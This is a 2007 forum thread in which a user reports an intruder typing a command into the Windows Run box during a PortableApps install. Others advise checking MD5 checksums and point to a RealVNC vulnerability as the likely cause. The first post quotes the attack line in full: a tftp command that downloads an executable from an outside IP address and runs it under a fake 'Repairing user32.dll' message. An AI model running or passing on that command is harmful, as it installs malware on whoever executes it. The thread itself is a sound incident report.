You are here

Home » Forums » General Forums » General Discussion

urgent - has malware been injected?

6 posts / 0 new
Log in or register to post comments
Last post
April 30, 2007 - 11:51am
#1
natv
Offline
Last seen: 17 years 9 months ago
Joined: 2007-02-09 22:14
urgent - has malware been injected?

Dear support:

This may or may not be related to portableapps, but I have to ask and put this out there.

I was installing portableapp for the first time (the full install, not lite). Somewhere towards the end of the install (i.e. 45 minutes later), I noticed some activity happening on my laptop.

Some windows were opening up by themselves. My start menu opened, and this command was placed in the Start - > Run box and was about to be run:

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 69.157.107.38 GET pbgf.exe & start pbgf&

I immediately cut the Internet connection right in the nick of time before this was run.

I can't find anything on Google relating to this pbgf.exe program, and the IP 69.157.107.38 if accessed via the web redirects to Google's home page.

So this really appears to be some kind of malware.

It could be a coincidence that this happened right at the end of the portableapps installation and that someone happened to be trying to hack into my laptop during that exact time.

Developers: please check the latest download for any signs of this.

Has anyone else noticed this?

Thanks
Nat

Top
April 30, 2007 - 12:12pm
Bahamut
Bahamut's picture
Offline
Last seen: 13 years 2 months ago
Joined: 2006-04-07 08:44
It's always a good idea to

It's always a good idea to check the checksum of the installer.

# MD5 Hash (for the geeks):
* Base: a65dd28f12f99fc0b633806f4afca0b5
* Lite: da9d15132d82bb9163f2d8274a842508
* Standard: e8d38570969225c7724ece8db09b5770

Jacksum is a good checksum utility.

Vintage!

Top
April 30, 2007 - 12:16pm
John T. Haller
John T. Haller's picture
Offline
Last seen: 7 hours 7 min ago
AdminDeveloperModeratorTranslator
Joined: 2005-11-28 22:21
Not in the real one

The official release is 100% clean as verified by multiple entities (Softpedia, Download.com, etc) as well as millions of users. Be sure to obtain the official releases from PortableApps.com. And, to be safe, you can check the MD5 sum to ensure you have an unaltered file (use software like winMd5Sum) to ensure it's the exact file we published.

Sometimes, the impossible can become possible, if you're awesome!

Top
April 30, 2007 - 3:44pm
(Reply to #3)
natv
Offline
Last seen: 17 years 9 months ago
Joined: 2007-02-09 22:14
Thanks

Thanks, yes the MD5 checks out, so must have just been a coincidence.

Must be some new type of malware too, as AVAST! didn't pick it up.

Top
April 30, 2007 - 3:45pm
(Reply to #4)
John T. Haller
John T. Haller's picture
Offline
Last seen: 7 hours 7 min ago
AdminDeveloperModeratorTranslator
Joined: 2005-11-28 22:21
VNC?

Do you use VNC? If so, I heard there was a recent vulnerability in RealVNC that is related:
http://secunia.com/advisories/20107/

Sometimes, the impossible can become possible, if you're awesome!

Top
April 30, 2007 - 4:55pm
(Reply to #5)
natv
Offline
Last seen: 17 years 9 months ago
Joined: 2007-02-09 22:14
wow yes I do and that was

wow yes I do and that was one of the first windows to pop up too, I have since disabled the server service, but glad to know how the actually got in!

Thanks for the link.

Top
Log in or register to post comments